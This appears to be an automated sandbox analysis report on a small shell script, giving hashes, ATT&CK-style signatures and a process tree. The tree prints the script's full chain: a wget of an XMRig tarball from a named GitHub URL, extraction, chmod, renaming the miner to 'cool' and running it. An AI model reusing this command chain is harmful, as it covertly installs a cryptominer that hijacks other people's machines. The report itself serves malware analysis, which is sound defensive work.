Analysis

  • max time kernel
    22s
  • max time network
    129s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
  • submitted
    30-10-2024 21:08

General

  • Target

    runnb.sh

  • Size

    213B

  • MD5

    a1189543e2f98f6696c6d857b899ab0a

  • SHA1

    30b167128357a05cb5ae4d8bd386d63839d99c4d

  • SHA256

    a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

  • SHA512

    472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • OS Credential Dumping 1 TTPs 1 IoCs

    Adversaries may attempt to dump credentials to use it in password cracking.

  • Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

    Abuse sudo or cached sudo credentials to execute code.

  • Enumerates kernel/hardware configuration 1 TTPs 8 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 28 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/runnb.sh
    /tmp/runnb.sh
    1⤵
      PID:1577
      • /usr/bin/sudo
        sudo apt install wget
        2⤵
        • OS Credential Dumping
        • Abuse Elevation Control Mechanism: Sudo and Sudo Caching
        • Reads runtime system information
        PID:1578
        • /usr/bin/apt
          apt install wget
          3⤵
          • Reads runtime system information
          PID:1579
          • /usr/bin/dpkg
            /usr/bin/dpkg --print-foreign-architectures
            4⤵
            • Reads runtime system information
            PID:1580
          • /usr/bin/dpkg
            /usr/bin/dpkg --print-foreign-architectures
            4⤵
            • Reads runtime system information
            PID:1584
          • /bin/sh
            /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
            4⤵
              PID:1585
              • /usr/bin/snap
                /usr/bin/snap advise-snap --from-apt
                5⤵
                • Enumerates kernel/hardware configuration
                • Reads runtime system information
                PID:1586
            • /bin/sh
              /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
              4⤵
                PID:1591
                • /usr/bin/snap
                  /usr/bin/snap advise-snap --from-apt
                  5⤵
                  • Enumerates kernel/hardware configuration
                  • Reads runtime system information
                  PID:1592
              • /bin/sh
                /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                4⤵
                  PID:1597
                  • /usr/bin/snap
                    /usr/bin/snap advise-snap --from-apt
                    5⤵
                    • Enumerates kernel/hardware configuration
                    • Reads runtime system information
                    PID:1598
                • /bin/sh
                  /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                  4⤵
                    PID:1604
                    • /usr/bin/snap
                      /usr/bin/snap advise-snap --from-apt
                      5⤵
                      • Enumerates kernel/hardware configuration
                      • Reads runtime system information
                      PID:1605
              • /usr/bin/apt
                apt install wget
                2⤵
                • Reads runtime system information
                PID:1610
                • /usr/bin/dpkg
                  /usr/bin/dpkg --print-foreign-architectures
                  3⤵
                  • Reads runtime system information
                  PID:1611
                • /usr/bin/dpkg
                  /usr/bin/dpkg --print-foreign-architectures
                  3⤵
                  • Reads runtime system information
                  PID:1612
                • /bin/sh
                  /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                  3⤵
                    PID:1613
                    • /usr/bin/snap
                      /usr/bin/snap advise-snap --from-apt
                      4⤵
                      • Enumerates kernel/hardware configuration
                      • Reads runtime system information
                      PID:1614
                  • /bin/sh
                    /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                    3⤵
                      PID:1622
                      • /usr/bin/snap
                        /usr/bin/snap advise-snap --from-apt
                        4⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:1623
                    • /bin/sh
                      /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                      3⤵
                        PID:1631
                        • /usr/bin/snap
                          /usr/bin/snap advise-snap --from-apt
                          4⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:1632
                      • /bin/sh
                        /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
                        3⤵
                          PID:1640
                          • /usr/bin/snap
                            /usr/bin/snap advise-snap --from-apt
                            4⤵
                            • Enumerates kernel/hardware configuration
                            • Reads runtime system information
                            PID:1641
                      • /usr/bin/wget
                        wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
                        2⤵
                          PID:1647
                        • /usr/bin/tar
                          tar xvf xmrigtar.tar.gz
                          2⤵
                          • Reads runtime system information
                          PID:1648
                        • /usr/bin/chmod
                          chmod +x xmrig
                          2⤵
                          • File and Directory Permissions Modification
                          PID:1649
                        • /usr/bin/mv
                          mv xmrig cool
                          2⤵
                          • Reads runtime system information
                          PID:1650
                        • /tmp/cool
                          ./cool
                          2⤵
                            PID:1651

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads